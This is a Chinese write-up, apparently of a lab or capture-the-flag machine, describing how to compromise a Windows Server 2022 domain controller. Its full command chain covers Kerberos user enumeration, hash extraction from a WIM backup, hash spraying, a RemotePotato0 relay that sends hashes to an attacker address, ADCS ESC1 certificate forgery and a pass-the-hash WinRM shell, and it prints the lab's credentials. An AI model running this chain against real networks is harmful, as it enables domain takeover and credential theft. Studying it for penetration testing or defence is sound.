2026-03-04 11:00:48 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档详述攻陷WindowsServer2022域控的全过程，利用Kerberos枚举与WIM备份提取哈希获取初始立足点，结合RemotePotato0中继攻击与ADCSESC1漏洞伪造证书实现提权。文中提供完整攻击命令链，强调备份文件泄露与证书配置不当风险，对域渗透实战具有较高参考价值。 综合评分： 85 文章分类： 渗透测试,内网渗透,实战经验,漏洞分析

cover_image

利用Windows映像备份与ADCS漏洞攻陷域控

柠檬赏金猎人

2026年3月2日 18:46 广东

概述

Shibuya是一台Windows Server 2022域控制器，攻击路径涉及Kerberos暴力破解、LDAP枚举、Windows映像文件分析、哈希传递攻击、跨会话中继攻击以及ADCS证书服务漏洞利用。通过逐步深入，最终获取域管理员权限并夺得root.txt。

技术/功能

Kerberos用户枚举：使用kerbrute工具进行用户名暴力破解
LDAP信息收集：通过获取的机器账户凭证枚举域内用户和组信息
Windows映像文件分析：利用7z工具提取WIM文件中的注册表配置单元
哈希提取与传递：使用secretsdump从注册表文件中提取NTLM哈希并进行密码喷洒攻击
跨会话中继攻击：利用RemotePotato0工具窃取已登录用户的NetNTLMv2哈希
ADCS漏洞利用：通过Certipy工具检测并利用ESC1漏洞伪造域管理员证书
权限提升：结合获取的证书通过WinRM获取域控完全控制权

使用示例

1. Kerberos用户枚举

kerbrute&nbsp;userenum&nbsp;-d&nbsp;shibuya.vl&nbsp;--dc&nbsp;10.129.234.42&nbsp;/opt/SecLists/Usernames/xato-net-10-million-usernames.txt

2. 从WIM文件中提取注册表哈希

#&nbsp;提取SAM、SECURITY、SYSTEM文件
7z&nbsp;x&nbsp;AWSJPWK0222-02.wim&nbsp;SAM
7z&nbsp;x&nbsp;AWSJPWK0222-02.wim&nbsp;SECURITY
7z&nbsp;x&nbsp;AWSJPWK0222-02.wim&nbsp;SYSTEM

#&nbsp;使用secretsdump提取哈希
secretsdump.py&nbsp;-sam&nbsp;SAM&nbsp;-security&nbsp;SECURITY&nbsp;-system&nbsp;SYSTEM&nbsp;local

3. 密码喷洒攻击

netexec&nbsp;smb&nbsp;shibuya.vl&nbsp;-u&nbsp;users&nbsp;-H&nbsp;5d8c3d1a20bd63f60f469f6763ca0d50&nbsp;--continue-on-success

4. RemotePotato0跨会话中继攻击

#&nbsp;攻击机设置端口转发
sudo&nbsp;socat&nbsp;-v&nbsp;TCP-LISTEN:135,fork,reuseaddr&nbsp;TCP:10.129.234.42:8888

#&nbsp;目标机执行（需要Session&nbsp;ID）
.\RemotePotato0.exe&nbsp;-m&nbsp;2&nbsp;-s&nbsp;1&nbsp;-x&nbsp;10.10.14.79&nbsp;-p&nbsp;8888

5. ESC1漏洞利用获取域管理员证书

#&nbsp;请求管理员证书
certipy&nbsp;req&nbsp;-u&nbsp;nigel.mills&nbsp;-p&nbsp;'Sail2Boat3'&nbsp;-dc-ip&nbsp;10.129.234.42&nbsp;\
&nbsp;&nbsp;-ca&nbsp;shibuya-AWSJPDC0522-CA&nbsp;-template&nbsp;ShibuyaWeb&nbsp;\
&nbsp;&nbsp;-upn&nbsp;[email protected]&nbsp;-target&nbsp;AWSJPDC0522.shibuya.vl&nbsp;\
&nbsp;&nbsp;-key-size&nbsp;4096&nbsp;-sid&nbsp;S-1-5-21-87560095-894484815-3652015022-500

#&nbsp;使用证书认证
certipy&nbsp;auth&nbsp;-pfx&nbsp;_admin.pfx&nbsp;-dc-ip&nbsp;10.129.234.42

6. 通过WinRM获取shell

evil-winrm&nbsp;-i&nbsp;10.129.234.42&nbsp;-u&nbsp;_admin&nbsp;-H&nbsp;bab5b2a004eabb11d865f31912b6b430

注意事项

Kerberos枚举：注意区分机器账户和用户账户，机器账户无法使用NTLM认证
防火墙规则：进行跨会话中继攻击前需检查目标防火墙规则，确保相关端口开放
证书模板配置：利用ESC1漏洞时需要确保证书模板允许客户端认证且用户可指定主题
时间同步：Kerberos认证对时间同步要求严格，确保攻击机与域控时间差在5分钟内
权限要求：RemotePotato0攻击需要目标用户已登录且具有交互式会话

参考链接

https://github.com/ropnop/kerbrute
https://github.com/fortra/impacket
https://github.com/antonioCoco/RemotePotato0
https://github.com/ly4k/Certipy
https://github.com/Hackplayers/evil-winrm

仅限交流学习使用，如您在使用本工具或代码的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。如侵权请私聊公众号删文。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：柠檬赏金猎人《利用Windows映像备份与ADCS漏洞攻陷域控》